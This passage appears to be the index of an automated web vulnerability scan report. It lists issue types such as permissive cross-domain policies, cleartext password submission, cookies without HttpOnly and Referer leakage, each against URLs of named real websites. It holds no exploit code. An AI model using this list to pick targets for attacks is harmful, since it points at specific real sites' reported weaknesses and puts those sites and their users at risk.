7.401. http://www.realage.com/crossdomain.xml
7.402. http://www.rei.com/crossdomain.xml
7.403. http://www.reuters.com/crossdomain.xml
7.404. http://www.reverbnation.com/crossdomain.xml
7.405. http://www.rightathome.com/crossdomain.xml
7.406. http://www.rivals.com/crossdomain.xml
7.407. http://www.rockyou.com/crossdomain.xml
7.408. http://www.rotoworld.com/crossdomain.xml
7.409. http://www.rottentomatoes.com/crossdomain.xml
7.410. http://www.roxwel.com/crossdomain.xml
7.411. http://www.salesforce.com/crossdomain.xml
7.412. http://www.salon.com/crossdomain.xml
7.413. http://www.scholastic.com/crossdomain.xml
7.414. http://www.sears.com/crossdomain.xml
7.415. http://www.seattlepi.com/crossdomain.xml
7.416. http://www.shangri-la.com/crossdomain.xml
7.417. http://www.shopathome.com/crossdomain.xml
7.418. http://www.shopstyle.com/crossdomain.xml
7.419. http://www.shutterfly.com/crossdomain.xml
7.420. http://www.simon.com/crossdomain.xml
7.421. http://www.simplyhired.com/crossdomain.xml
7.422. http://www.sixflags.com/crossdomain.xml
7.423. http://www.sky.com/crossdomain.xml
7.424. http://www.skype.com/crossdomain.xml
7.425. http://www.slate.com/crossdomain.xml
7.426. http://www.slide.com/crossdomain.xml
7.427. http://www.smarter.com/crossdomain.xml
7.428. http://www.smilebox.com/crossdomain.xml
7.429. http://www.smileycentral.com/crossdomain.xml
7.430. http://www.snapfish.com/crossdomain.xml
7.431. http://www.softonic.com/crossdomain.xml
7.432. http://www.spanishdict.com/crossdomain.xml
7.433. http://www.spellingcity.com/crossdomain.xml
7.434. http://www.sportsauthority.com/crossdomain.xml
7.435. http://www.star-telegram.com/crossdomain.xml
7.436. http://www.startribune.com/crossdomain.xml
7.437. http://www.stumbleupon.com/crossdomain.xml
7.438. http://www.stylelist.com/crossdomain.xml
7.439. http://www.superpages.com/crossdomain.xml
7.440. http://www.symantec.com/crossdomain.xml
7.441. http://www.t-mobile.com/crossdomain.xml
7.442. http://www.tagged.com/crossdomain.xml
7.443. http://www.target.com/crossdomain.xml
7.444. http://www.tarot.com/crossdomain.xml
7.445. http://www.tasteofhome.com/crossdomain.xml
7.446. http://www.telegraph.co.uk/crossdomain.xml
7.447. http://www.thefrisky.com/crossdomain.xml
7.448. http://www.thirdage.com/crossdomain.xml
7.449. http://www.ticketmaster.com/crossdomain.xml
7.450. http://www.tigerdirect.com/crossdomain.xml
7.451. http://www.tinypic.com/crossdomain.xml
7.452. http://www.tmz.com/crossdomain.xml
7.453. http://www.toptenreviews.com/crossdomain.xml
7.454. http://www.toyota.com/crossdomain.xml
7.455. http://www.toysrus.com/crossdomain.xml
7.456. http://www.tracfone.com/crossdomain.xml
7.457. http://www.travelocity.com/crossdomain.xml
7.458. http://www.tripadvisor.com/crossdomain.xml
7.459. http://www.true.com/crossdomain.xml
7.460. http://www.trulia.com/crossdomain.xml
7.461. http://www.tv.com/crossdomain.xml
7.462. http://www.tvguide.com/crossdomain.xml
7.463. http://www.univision.com/crossdomain.xml
7.464. http://www.ups.com/crossdomain.xml
7.465. http://www.usatoday.com/crossdomain.xml
7.466. http://www.use.com/crossdomain.xml
7.467. http://www.usgs.gov/crossdomain.xml
7.468. http://www.usmagazine.com/crossdomain.xml
7.469. http://www.vast.com/crossdomain.xml
7.470. http://www.verizon.net/crossdomain.xml
7.471. http://www.victoriassecret.com/crossdomain.xml
7.472. http://www.videobash.com/crossdomain.xml
7.473. http://www.walletpop.com/crossdomain.xml
7.474. http://www.walmart.com/crossdomain.xml
7.475. http://www.warnerbros.com/crossdomain.xml
7.476. http://www.washingtonpost.com/crossdomain.xml
7.477. http://www.weather.com/crossdomain.xml
7.478. http://www.webshots.com/crossdomain.xml
7.479. http://www.weightwatchers.com/crossdomain.xml
7.480. http://www.wetpaint.com/crossdomain.xml
7.481. http://www.whitehouse.gov/crossdomain.xml
7.482. http://www.wimp.com/crossdomain.xml
7.483. http://www.wn.com/crossdomain.xml
7.484. http://www.womansday.com/crossdomain.xml
7.485. http://www.worldwinner.com/crossdomain.xml
7.486. http://www.wsbtv.com/crossdomain.xml
7.487. http://www.wwe.com/crossdomain.xml
7.488. http://www.yallwire.com/crossdomain.xml
7.489. http://www.yellowpages.com/crossdomain.xml
7.490. http://www.yontoo.com/crossdomain.xml
7.491. http://www.zap2it.com/crossdomain.xml
7.492. http://www.zappos.com/crossdomain.xml
7.493. http://www.zazzle.com/crossdomain.xml
7.494. http://www.zmags.com/crossdomain.xml
7.495. http://www.zshare.net/crossdomain.xml
7.496. http://www.zwinky.com/crossdomain.xml
7.497. http://www.zynga.com/crossdomain.xml
7.498. http://www.active.com/crossdomain.xml
7.499. http://www.allmenus.com/crossdomain.xml
7.500. http://www.autotrader.com/crossdomain.xml
7.501. http://www.autotraderstatic.com/crossdomain.xml
7.502. http://www.blackplanet.com/crossdomain.xml
7.503. http://www.boston.com/crossdomain.xml
7.504. http://www.christianbook.com/crossdomain.xml
7.505. http://www.chuckecheese.com/crossdomain.xml
7.506. http://www.cincinnati.com/crossdomain.xml
7.507. http://www.continental.com/crossdomain.xml
7.508. http://www.deadline.com/crossdomain.xml
7.509. http://www.deviantart.com/crossdomain.xml
7.510. http://www.dreamstime.com/crossdomain.xml
7.511. http://www.elyrics.net/crossdomain.xml
7.512. http://www.elyricsworld.com/crossdomain.xml
7.513. http://www.epicurious.com/crossdomain.xml
7.514. http://www.greatschools.org/crossdomain.xml
7.515. http://www.icontact.com/crossdomain.xml
7.516. http://www.inbox.com/crossdomain.xml
7.517. http://www.iwon.com/crossdomain.xml
7.518. http://www.justluxe.com/crossdomain.xml
7.519. http://www.kazaa.com/crossdomain.xml
7.520. http://www.kodak.com/crossdomain.xml
7.521. http://www.livejournal.com/crossdomain.xml
7.522. http://www.loc.gov/crossdomain.xml
7.523. http://www.lowfares.com/crossdomain.xml
7.524. http://www.lyricsmode.com/crossdomain.xml
7.525. http://www.marriott.com/crossdomain.xml
7.526. http://www.michaels.com/crossdomain.xml
7.527. http://www.mlive.com/crossdomain.xml
7.528. http://www.motime.com/crossdomain.xml
7.529. http://www.movietickets.com/crossdomain.xml
7.530. http://www.orbitz.com/crossdomain.xml
7.531. http://www.panoramio.com/crossdomain.xml
7.532. http://www.phoenix.edu/crossdomain.xml
7.533. http://www.playdom.com/crossdomain.xml
7.534. http://www.regions.com/crossdomain.xml
7.535. http://www.rr.com/crossdomain.xml
7.536. http://www.sacbee.com/crossdomain.xml
7.537. http://www.sharebuilder.com/crossdomain.xml
7.538. http://www.stltoday.com/crossdomain.xml
7.539. http://www.stlyrics.com/crossdomain.xml
7.540. http://www.talkingpointsmemo.com/crossdomain.xml
7.541. http://www.tamu.edu/crossdomain.xml
7.542. http://www.thisis50.com/crossdomain.xml
7.543. http://www.thomasnet.com/crossdomain.xml
7.544. http://www.tradekey.com/crossdomain.xml
7.545. http://www.umich.edu/crossdomain.xml
7.546. http://www.verisign.com/crossdomain.xml
7.547. http://www.vimeo.com/crossdomain.xml
7.548. http://www.vistaprint.com/crossdomain.xml
7.549. http://www.walgreens.com/crossdomain.xml
7.550. http://www.xe.com/crossdomain.xml
8. Silverlight cross-domain policy
8.1. http://ad.doubleclick.net/clientaccesspolicy.xml
8.2. http://s0.2mdn.net/clientaccesspolicy.xml
8.3. http://www.cbssports.com/clientaccesspolicy.xml
8.4. http://www.coveritlive.com/clientaccesspolicy.xml
8.5. http://www.intellicast.com/clientaccesspolicy.xml
8.6. http://www.nadaguides.com/clientaccesspolicy.xml
8.7. http://www.ncm.com/clientaccesspolicy.xml
8.8. http://www.opinionshere.com/clientaccesspolicy.xml
8.9. http://www.safelinkwireless.com/clientaccesspolicy.xml
8.10. http://www.usatoday.com/clientaccesspolicy.xml
8.11. http://www.winbuyer.com/clientaccesspolicy.xml
8.12. http://www.cbs.com/clientaccesspolicy.xml
8.13. http://www.cnbc.com/clientaccesspolicy.xml
8.14. http://www.fidelity.com/clientaccesspolicy.xml
8.15. http://www.indiatimes.com/clientaccesspolicy.xml
8.16. http://www.msnbc.com/clientaccesspolicy.xml
8.17. http://www.nationalgeographic.com/clientaccesspolicy.xml
8.18. http://www.sky.com/clientaccesspolicy.xml
8.19. http://www.xbox.com/clientaccesspolicy.xml
8.20. http://www.kmart.com/clientaccesspolicy.xml
8.21. http://www.sears.com/clientaccesspolicy.xml
8.22. http://www.usa.gov/clientaccesspolicy.xml
9. Cleartext submission of password
9.1. http://www.collegehumor.com/favicon.ico
9.2. http://www.popularscreensavers.com/favicon.ico
9.3. http://www.popularscreensavers.com/favicon.ico
9.4. http://www.popularscreensavers.com/favicon.ico
10.1. http://www.4shared.com/favicon.ico [REST URL parameter 1]
10.2. http://www.altervista.org/favicon.ico [REST URL parameter 1]
10.3. http://www.bathandbodyworks.com/favicon.ico [REST URL parameter 1]
10.4. http://www.bizrate.com/favicon.ico [REST URL parameter 1]
10.5. http://www.bravotv.com/favicon.ico [REST URL parameter 1]
10.6. http://www.columbia.edu/favicon.ico [REST URL parameter 1]
10.7. http://www.consumersearch.com/favicon.ico [REST URL parameter 1]
10.8. http://www.dickssportinggoods.com/favicon.ico [REST URL parameter 1]
10.9. http://www.diynetwork.com/favicon.ico [REST URL parameter 1]
10.10. http://www.ehow.co.uk/favicon.ico [REST URL parameter 1]
10.11. http://www.examiner.com/favicon.ico [REST URL parameter 1]
10.12. http://www.foodnetwork.com/favicon.ico [REST URL parameter 1]
10.13. http://www.hollywoodlife.com/favicon.ico [REST URL parameter 1]
10.14. http://www.house.gov/favicon.ico [REST URL parameter 1]
10.15. http://www.k12.com/favicon.ico [REST URL parameter 1]
10.16. http://www.kazaa.com/favicon.ico [REST URL parameter 1]
10.17. http://www.macrumors.com/favicon.ico [REST URL parameter 1]
10.18. http://www.orbitz.com/favicon.ico [REST URL parameter 1]
10.19. http://www.psu.edu/favicon.ico [REST URL parameter 1]
10.20. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]
10.21. http://www.southwest.com/favicon.ico [REST URL parameter 1]
10.22. http://www.ufl.edu/favicon.ico [REST URL parameter 1]
10.23. http://www.ultimate-guitar.com/favicon.ico [REST URL parameter 1]
10.24. http://www.usgs.gov/favicon.ico [REST URL parameter 1]
10.25. http://www.where2getit.com/favicon.ico [REST URL parameter 1]
10.26. http://www.wimp.com/favicon.ico [REST URL parameter 1]
10.27. http://www.wunderground.com/favicon.ico [REST URL parameter 1]
11. ASP.NET ViewState without MAC enabled
12.1. http://www.lalate.com/favicon.ico [name of an arbitrarily supplied request parameter]
12.2. http://www.outsidehub.com/favicon.ico [name of an arbitrarily supplied request parameter]
12.3. http://www.paypal-shopping.com/favicon.ico [name of an arbitrarily supplied request parameter]
12.4. http://www.swipebids.com/favicon.ico [REST URL parameter 1]
12.5. http://www.swipebids.com/favicon.ico [name of an arbitrarily supplied request parameter]
12.6. http://www.virtuagirlhd.com/favicon.ico [name of an arbitrarily supplied request parameter]
13. Cookie scoped to parent domain
13.1. http://www.androidcentral.com/favicon.ico
13.2. http://www.easybib.com/favicon.ico
13.3. http://www.evite.com/favicon.ico
13.4. http://www.genealogy.com/favicon.ico
13.5. http://www.mapquest.com/favicon.ico
13.6. http://www.mayoclinic.com/favicon.ico
13.7. http://www.musiciansfriend.com/favicon.ico
13.8. http://www.ning.com/favicon.ico
13.9. http://www.pronto.com/favicon.ico
13.10. http://www.softonic.com/favicon.ico
13.11. http://www.thisis50.com/favicon.ico
13.12. http://www.worthpoint.com/favicon.ico
13.13. http://maps.google.com/maps
13.14. http://maps.google.com/maps/gen_204
13.15. http://maps.google.com/maps/vp
13.16. http://safebrowsing.clients.google.com/safebrowsing/downloads
13.17. http://translate.google.com/translate_a/element.js
13.18. http://www.411.com/favicon.ico
13.19. http://www.addresses.com/favicon.ico
13.20. http://www.advanceautoparts.com/favicon.ico
13.21. http://www.alibaba.com/favicon.ico
13.22. http://www.americanexpress.com/favicon.ico
13.23. http://www.apartments.com/favicon.ico
13.24. http://www.automotive.com/favicon.ico
13.25. http://www.autotrader.com/favicon.ico
13.26. http://www.baidu.com/favicon.ico
13.27. http://www.bidcactus.com/favicon.ico
13.28. http://www.bizjournals.com/favicon.ico
13.29. http://www.buzznet.com/favicon.ico
13.30. http://www.cisco.com/favicon.ico
13.31. http://www.collegehumor.com/favicon.ico
13.32. http://www.cornell.edu/favicon.ico
13.33. http://www.directv.com/favicon.ico
13.34. http://www.discovercard.com/favicon.ico
13.35. http://www.eharmony.com/favicon.ico
13.36. http://www.emedtv.com/favicon.ico
13.37. http://www.epinions.com/favicon.ico
13.38. http://www.fedex.com/favicon.ico
13.39. http://www.fool.com/favicon.ico
13.40. http://www.funbrain.com/favicon.ico
13.41. http://www.gamehouse.com/favicon.ico
13.42. http://www.guardian.co.uk/favicon.ico
13.43. http://www.hayneedle.com/favicon.ico
13.44. http://www.hiexpress.com/favicon.ico
13.45. http://www.holidayinn.com/favicon.ico
13.46. http://www.hsn.com/favicon.ico
13.47. http://www.ichotelsgroup.com/favicon.ico
13.48. http://www.imageshack.us/favicon.ico
13.49. http://www.know-where.com/favicon.ico
13.50. http://www.life123.com/favicon.ico
13.51. http://www.lingospot.com/favicon.ico
13.52. http://www.marykay.com/favicon.ico
13.53. http://www.mbnanetaccess.com/favicon.ico
13.54. http://www.metropcs.com/favicon.ico
13.55. http://www.motortrend.com/favicon.ico
13.56. http://www.netflix.com/favicon.ico
13.57. http://www.nintendo.com/favicon.ico
13.58. http://www.nytimes.com/favicon.ico
13.59. http://www.officedepot.com/favicon.ico
13.60. http://www.okcupid.com/favicon.ico
13.61. http://www.pbs.org/favicon.ico
13.62. http://www.pizzahut.com/favicon.ico
13.63. http://www.playlist.com/favicon.ico
13.64. http://www.potterybarn.com/favicon.ico
13.65. http://www.progressive.com/favicon.ico
13.66. http://www.qvc.com/favicon.ico
13.67. http://www.qwest.com/favicon.ico
13.68. http://www.seniorpeoplemeet.com/favicon.ico
13.69. http://www.sfgate.com/favicon.ico
13.70. http://www.sharebuilder.com/favicon.ico
13.71. http://www.terra.com/favicon.ico
13.72. http://www.thefind.com/favicon.ico
13.73. http://www.thehollywoodgossip.com/favicon.ico
13.74. http://www.ticketmaster.com/favicon.ico
13.75. http://www.travelocity.com/favicon.ico
13.76. http://www.true.com/favicon.ico
13.77. http://www.uhaul.com/favicon.ico
13.78. http://www.united.com/favicon.ico
13.79. http://www.veoh.com/favicon.ico
13.80. http://www.verisign.com/favicon.ico
13.81. http://www.virtualtourist.com/favicon.ico
13.82. http://www.vistaprint.com/favicon.ico
13.83. http://www.wachovia.com/favicon.ico
13.84. http://www.warnerbros.com/favicon.ico
13.85. http://www.wellsfargo.com/favicon.ico
13.86. http://www.whitepages.com/favicon.ico
13.87. http://www.wsbtv.com/favicon.ico
13.88. http://www.yellowpages.com/favicon.ico
14. Cookie without HttpOnly flag set
14.1. http://www.androidcentral.com/favicon.ico
14.2. http://www.aon.com/favicon.ico
14.3. http://www.biglots.com/favicon.ico
14.4. http://www.bullishbankers.com/favicon.ico
14.5. http://www.centurylink.com/favicon.ico
14.6. http://www.chacha.com/favicon.ico
14.7. http://www.emedicinehealth.com/favicon.ico
14.8. http://www.evite.com/favicon.ico
14.9. http://www.freeridegames.com/favicon.ico
14.10. http://www.genealogy.com/favicon.ico
14.11. http://www.gofreecredit.com/favicon.ico
14.12. http://www.hayneedle.com/favicon.ico
14.13. http://www.kaboodle.com/favicon.ico
14.14. http://www.livevideo.com/favicon.ico
14.15. http://www.lowermybills.com/favicon.ico
14.16. http://www.lyrics.com/favicon.ico
14.17. http://www.mapquest.com/favicon.ico
14.18. http://www.mayoclinic.com/favicon.ico
14.19. http://www.medicinenet.com/favicon.ico
14.20. http://www.mrmovietimes.com/favicon.ico
14.21. http://www.musiciansfriend.com/favicon.ico
14.22. http://www.ncnetwork.net/favicon.ico
14.23. http://www.ning.com/favicon.ico
14.24. http://www.popularscreensavers.com/favicon.ico
14.25. http://www.prioritymail.com/favicon.ico
14.26. http://www.pronto.com/favicon.ico
14.27. http://www.questia.com/favicon.ico
14.28. http://www.rxlist.com/favicon.ico
14.29. http://www.softonic.com/favicon.ico
14.30. http://www.suntimes.com/favicon.ico
14.31. http://www.thegrids.info/favicon.ico
14.32. http://www.thisis50.com/favicon.ico
14.33. http://www.travel-ticker.com/favicon.ico
14.34. http://www.usajobs.gov/favicon.ico
14.35. http://www.verizon.net/favicon.ico
14.36. http://www.websitealive.com/favicon.ico
14.37. http://www.wellness.com/favicon.ico
14.38. http://www.wendys.com/favicon.ico
14.39. http://www.windows.com/favicon.ico
14.40. http://www.worthpoint.com/favicon.ico
14.41. http://maps.google.com/maps
14.42. http://maps.google.com/maps/gen_204
14.43. http://maps.google.com/maps/vp
14.44. http://safebrowsing.clients.google.com/safebrowsing/downloads
14.45. http://smp.adviva.net/track/v=4
14.46. http://translate.google.com/translate_a/element.js
14.47. http://www.2wire.net/favicon.ico
14.48. http://www.411.com/favicon.ico
14.49. http://www.4shared.com/favicon.ico
14.50. http://www.aarp.org/favicon.ico
14.51. http://www.aboutus.org/favicon.ico
14.52. http://www.addresses.com/favicon.ico
14.53. http://www.adp.com/favicon.ico
14.54. http://www.advanceautoparts.com/favicon.ico
14.55. http://www.alibaba.com/favicon.ico
14.56. http://www.americanexpress.com/favicon.ico
14.57. http://www.americantowns.com/favicon.ico
14.58. http://www.apartmentratings.com/favicon.ico
14.59. http://www.apartments.com/favicon.ico
14.60. http://www.automotive.com/favicon.ico
14.61. http://www.autotrader.com/favicon.ico
14.62. http://www.autozone.com/favicon.ico
14.63. http://www.away.com/favicon.ico
14.64. http://www.baidu.com/favicon.ico
14.65. http://www.bankofamerica.com/favicon.ico
14.66. http://www.bbt.com/favicon.ico
14.67. http://www.bidcactus.com/favicon.ico
14.68. http://www.bizjournals.com/favicon.ico
14.69. http://www.blogrolling.com/favicon.ico
14.70. http://www.business.com/favicon.ico
14.71. http://www.buzznet.com/favicon.ico
14.72. http://www.carmax.com/favicon.ico
14.73. http://www.cars.com/favicon.ico
14.74. http://www.cheapoair.com/favicon.ico
14.75. http://www.cheaptickets.com/favicon.ico
14.76. http://www.cisco.com/favicon.ico
14.77. http://www.classesusa.com/favicon.ico
14.78. http://www.cnn.com/favicon.ico
14.79. http://www.collegeconfidential.com/favicon.ico
14.80. http://www.collegehumor.com/favicon.ico
14.81. http://www.collegesurfing.com/favicon.ico
14.82. http://www.comcast.com/favicon.ico
14.83. http://www.contacthr.com/favicon.ico
14.84. http://www.cornell.edu/favicon.ico
14.85. http://www.coupons.com/favicon.ico
14.86. http://www.cracked.com/favicon.ico
14.87. http://www.curse.com/favicon.ico
14.88. http://www.cyberdefender.com/favicon.ico
14.89. http://www.dallasnews.com/favicon.ico
14.90. http://www.dealer.com/favicon.ico
14.91. http://www.deere.com/favicon.ico
14.92. http://www.directv.com/favicon.ico
14.93. http://www.discovercard.com/favicon.ico
14.94. http://www.doityourself.com/favicon.ico
14.95. http://www.drugstore.com/favicon.ico
14.96. http://www.eharmony.com/favicon.ico
14.97. http://www.ehealthforum.com/favicon.ico
14.98. http://www.emedtv.com/favicon.ico
14.99. http://www.epinions.com/favicon.ico
14.100. http://www.factmonster.com/favicon.ico
14.101. http://www.familydoctor.org/favicon.ico
14.102. http://www.fedex.com/favicon.ico
14.103. http://www.fool.com/favicon.ico
14.104. http://www.frontier.com/favicon.ico
14.105. http://www.funbrain.com/favicon.ico
14.106. http://www.gamehouse.com/favicon.ico
14.107. http://www.gifts.com/favicon.ico
14.108. http://www.guardian.co.uk/favicon.ico
14.109. http://www.guitarcenter.com/favicon.ico
14.110. http://www.gunbroker.com/favicon.ico
14.111. http://www.healthgrades.com/favicon.ico
14.112. http://www.hi5.com/favicon.ico
14.113. http://www.hiexpress.com/favicon.ico
14.114. http://www.holidayinn.com/favicon.ico
14.115. http://www.hotpads.com/favicon.ico
14.116. http://www.hsbccreditcard.com/favicon.ico
14.117. http://www.hsn.com/favicon.ico
14.118. http://www.hubspot.com/favicon.ico
14.119. http://www.ichotelsgroup.com/favicon.ico
14.120. http://www.imageshack.us/favicon.ico
14.121. http://www.in.gov/favicon.ico
14.122. http://www.info.com/favicon.ico
14.123. http://www.infoplease.com/favicon.ico
14.124. http://www.informationgetter.com/favicon.ico
14.125. http://www.intelius.com/favicon.ico
14.126. http://www.investopedia.com/favicon.ico
14.127. http://www.iwon.com/favicon.ico
14.128. http://www.joann.com/favicon.ico
14.129. http://www.jstor.org/favicon.ico
14.130. http://www.kaspersky.com/favicon.ico
14.131. http://www.kbb.com/favicon.ico
14.133. http://www.kcom.com/contact-us/
14.134. http://www.kcom.com/contact-us/brighton
14.135. http://www.kcom.com/large-enterprise/
14.136. http://www.know-where.com/favicon.ico
14.137. http://www.kosmix.com/favicon.ico
14.138. http://www.life123.com/favicon.ico
14.139. http://www.lingospot.com/favicon.ico
14.140. http://www.livenation.com/favicon.ico
14.141. http://www.livescience.com/favicon.ico
14.142. http://www.marykay.com/favicon.ico
14.143. http://www.mbnanetaccess.com/favicon.ico
14.144. http://www.medscape.com/favicon.ico
14.145. http://www.merck.com/favicon.ico
14.146. http://www.modelmayhem.com/favicon.ico
14.147. http://www.motime.com/favicon.ico
14.148. http://www.motortrend.com/favicon.ico
14.149. http://www.mynewplace.com/favicon.ico
14.150. http://www.newegg.com/favicon.ico
14.151. http://www.nintendo.com/favicon.ico
14.152. http://www.nydailynews.com/favicon.ico
14.153. http://www.nymag.com/favicon.ico
14.154. http://www.nytimes.com/favicon.ico
14.155. http://www.officedepot.com/favicon.ico
14.156. http://www.okcupid.com/favicon.ico
14.157. http://www.olivegarden.com/favicon.ico
14.158. http://www.onemanga.com/favicon.ico
14.159. http://www.openforum.com/favicon.ico
14.160. http://www.opinionshere.com/favicon.ico
14.161. http://www.orbitz.com/favicon.ico
14.162. http://www.orchardbank.com/favicon.ico
14.163. http://www.outdoorchannel.com/favicon.ico
14.164. http://www.pbs.org/favicon.ico
14.165. http://www.peekyou.com/favicon.ico
14.166. http://www.peoplelookup.com/favicon.ico
14.167. http://www.pizzahut.com/favicon.ico
14.168. http://www.playlist.com/favicon.ico
14.169. http://www.pnc.com/favicon.ico
14.170. http://www.potterybarn.com/favicon.ico
14.171. http://www.pricegrabber.com/favicon.ico
14.172. http://www.progressive.com/favicon.ico
14.173. http://www.purdue.edu/favicon.ico
14.174. http://www.qualityhealth.com/favicon.ico
14.175. http://www.qvc.com/favicon.ico
14.176. http://www.qwest.com/favicon.ico
14.177. http://www.regions.com/favicon.ico
14.178. http://www.reverbnation.com/favicon.ico
14.179. http://www.righthealth.com/favicon.ico
14.180. http://www.searchassist.com/favicon.ico
14.181. http://www.sfgate.com/favicon.ico
14.182. http://www.sharebuilder.com/favicon.ico
14.183. http://www.shoebuy.com/favicon.ico
14.184. http://www.shutterfly.com/favicon.ico
14.185. http://www.snapfish.com/favicon.ico
14.186. http://www.space.com/favicon.ico
14.187. http://www.staples.com/favicon.ico
14.188. http://www.straighttalk.com/favicon.ico
14.189. http://www.suite101.com/favicon.ico
14.190. http://www.terra.com/favicon.ico
14.191. http://www.thefind.com/favicon.ico
14.192. http://www.theglobeandmail.com/favicon.ico
14.193. http://www.thehollywoodgossip.com/favicon.ico
14.194. http://www.thinkquest.org/favicon.ico
14.195. http://www.ticketmaster.com/favicon.ico
14.196. http://www.totalbeauty.com/favicon.ico
14.197. http://www.tracfone.com/favicon.ico
14.198. http://www.travelocity.com/favicon.ico
14.199. http://www.true.com/favicon.ico
14.200. http://www.tvtxtr.com/favicon.ico
14.201. http://www.uhaul.com/favicon.ico
14.202. http://www.united.com/favicon.ico
14.203. http://www.usa-people-search.com/favicon.ico
14.204. http://www.veoh.com/favicon.ico
14.205. http://www.verisign.com/favicon.ico
14.206. http://www.videobash.com/favicon.ico
14.207. http://www.virtualtourist.com/favicon.ico
14.208. http://www.vistaprint.com/favicon.ico
14.209. http://www.wachovia.com/favicon.ico
14.210. http://www.warnerbros.com/favicon.ico
14.211. http://www.webs.com/favicon.ico
14.212. http://www.wellsfargo.com/favicon.ico
14.213. http://www.whitepages.com/favicon.ico
14.214. http://www.wildgames.com/favicon.ico
14.215. http://www.wirefly.com/favicon.ico
14.216. http://www.wsbtv.com/favicon.ico
14.217. http://www.xe.com/favicon.ico
14.218. http://www.yellowpages.com/favicon.ico
14.219. http://www.zillow.com/favicon.ico
15. Password field with autocomplete enabled
15.1. http://www.collegehumor.com/favicon.ico
15.2. http://www.popularscreensavers.com/favicon.ico
15.3. http://www.popularscreensavers.com/favicon.ico
15.4. http://www.popularscreensavers.com/favicon.ico
16.1. http://www.blogtv.com/Default.aspx
16.2. http://www.clearchannel.com/Default.aspx
16.3. http://www.findlocation.com/Default.aspx
16.4. http://www.investopedia.com/Default.aspx
16.5. http://www.medicare.gov/Default.aspx
16.6. http://www.netquote.com/Default.aspx
16.7. http://www.newegg.com/Default.aspx
16.8. http://www.pch.com/Default.aspx
16.9. http://www.plentyoffish.com/Default.aspx
16.10. http://www.pricegong.com/Default.aspx
16.11. http://www.shopperreports.com/Default.aspx
16.12. http://www.tidaltv.com/Default.aspx
16.13. http://www.weatherbug.com/Default.aspx
16.14. http://www.wellness.com/Default.aspx
16.15. http://www.winbuyer.com/Default.aspx
17. Referer-dependent response
18.1. http://www.kcom.com/contact-us/
18.2. http://www.realsimple.com/favicon.ico
19. Cross-domain Referer leakage
19.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27
19.2. http://fls.doubleclick.net/activityi
19.3. http://fls.doubleclick.net/activityi
19.4. http://googleads.g.doubleclick.net/pagead/ads
19.5. http://googleads.g.doubleclick.net/pagead/ads
19.6. http://googleads.g.doubleclick.net/pagead/ads
19.7. http://googleads.g.doubleclick.net/pagead/ads
19.8. http://googleads.g.doubleclick.net/pagead/ads
19.9. http://googleads.g.doubleclick.net/pagead/ads
19.10. http://googleads.g.doubleclick.net/pagead/ads
19.11. http://googleads.g.doubleclick.net/pagead/ads
19.12. http://googleads.g.doubleclick.net/pagead/ads
19.13. http://googleads.g.doubleclick.net/pagead/ads
19.14. http://googleads.g.doubleclick.net/pagead/ads
19.15. http://googleads.g.doubleclick.net/pagead/ads
19.16. http://googleads.g.doubleclick.net/pagead/ads
19.17. http://googleads.g.doubleclick.net/pagead/ads
19.18. http://googleads.g.doubleclick.net/pagead/ads
19.19. http://googleads.g.doubleclick.net/pagead/ads
19.20. http://googleads.g.doubleclick.net/pagead/ads
19.21. http://googleads.g.doubleclick.net/pagead/ads
19.22. http://googleads.g.doubleclick.net/pagead/ads
19.23. http://googleads.g.doubleclick.net/pagead/ads
19.24. http://googleads.g.doubleclick.net/pagead/ads
19.25. http://googleads.g.doubleclick.net/pagead/ads
19.26. http://googleads.g.doubleclick.net/pagead/ads
19.27. http://googleads.g.doubleclick.net/pagead/ads
19.28. http://googleads.g.doubleclick.net/pagead/ads
19.29. http://googleads.g.doubleclick.net/pagead/ads
19.30. http://googleads.g.doubleclick.net/pagead/ads
19.31. http://googleads.g.doubleclick.net/pagead/ads
19.32. http://googleads.g.doubleclick.net/pagead/ads
19.33. http://googleads.g.doubleclick.net/pagead/ads
19.34. http://googleads.g.doubleclick.net/pagead/ads
19.35. http://googleads.g.doubleclick.net/pagead/ads
19.36. http://googleads.g.doubleclick.net/pagead/ads
19.37. http://googleads.g.doubleclick.net/pagead/ads
19.38. http://googleads.g.doubleclick.net/pagead/ads
19.39. http://googleads.g.doubleclick.net/pagead/ads
19.40. http://googleads.g.doubleclick.net/pagead/ads
19.41. http://googleads.g.doubleclick.net/pagead/ads
19.42. http://googleads.g.doubleclick.net/pagead/ads
19.43. http://googleads.g.doubleclick.net/pagead/ads
20. Cross-domain script include
20.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27
20.2. http://fls.doubleclick.net/activityi
20.3. http://googleads.g.doubleclick.net/pagead/ads
20.4. http://googleads.g.doubleclick.net/pagead/ads
20.5. http://www.411.com/favicon.ico
20.6. http://www.800notes.com/favicon.ico
20.7. http://www.androidcentral.com/favicon.ico
20.8. http://www.biglots.com/favicon.ico
20.9. http://www.bizjournals.com/favicon.ico
20.10. http://www.blogs.com/favicon.ico
20.11. http://www.bullishbankers.com/favicon.ico
20.12. http://www.canon.com/favicon.ico
20.13. http://www.citibank.com/favicon.ico
20.14. http://www.collegehumor.com/favicon.ico
20.15. http://www.curse.com/favicon.ico
20.16. http://www.dealer.com/favicon.ico
20.17. http://www.dexknows.com/favicon.ico
20.18. http://www.ebayclassifieds.com/favicon.ico
20.19. http://www.elyricsworld.com/favicon.ico
20.20. http://www.freeridegames.com/favicon.ico
20.21. http://www.games.com/favicon.ico
20.22. http://www.guitarcenter.com/favicon.ico
20.23. http://www.hayneedle.com/favicon.ico
20.24. http://www.iloveindia.com/favicon.ico
20.25. http://www.kcom.com/contact-us/brighton
20.26. http://www.lanebryant.com/favicon.ico
20.27. http://www.life123.com/favicon.ico
20.28. http://www.menupages.com/favicon.ico
20.29. http://www.moshimonsters.com/favicon.ico
20.30. http://www.mrmovietimes.com/favicon.ico
20.31. http://www.myrecipes.com/favicon.ico
20.32. http://www.newport-news.com/favicon.ico
20.33. http://www.onemanga.com/favicon.ico
20.34. http://www.pga.com/favicon.ico
20.35. http://www.popularscreensavers.com/favicon.ico
20.36. http://www.skype.com/favicon.ico
20.37. http://www.suntimes.com/favicon.ico
20.38. http://www.tasteofhome.com/favicon.ico
20.39. http://www.teennick.com/favicon.ico
20.40. http://www.ufc.com/favicon.ico
20.41. http://www.usa.gov/favicon.ico
20.42. http://www.usajobs.gov/favicon.ico
20.43. http://www.videobash.com/favicon.ico
20.44. http://www.websitealive.com/favicon.ico
20.45. http://www.wellness.com/favicon.ico
20.46. http://www.whitepages.com/favicon.ico
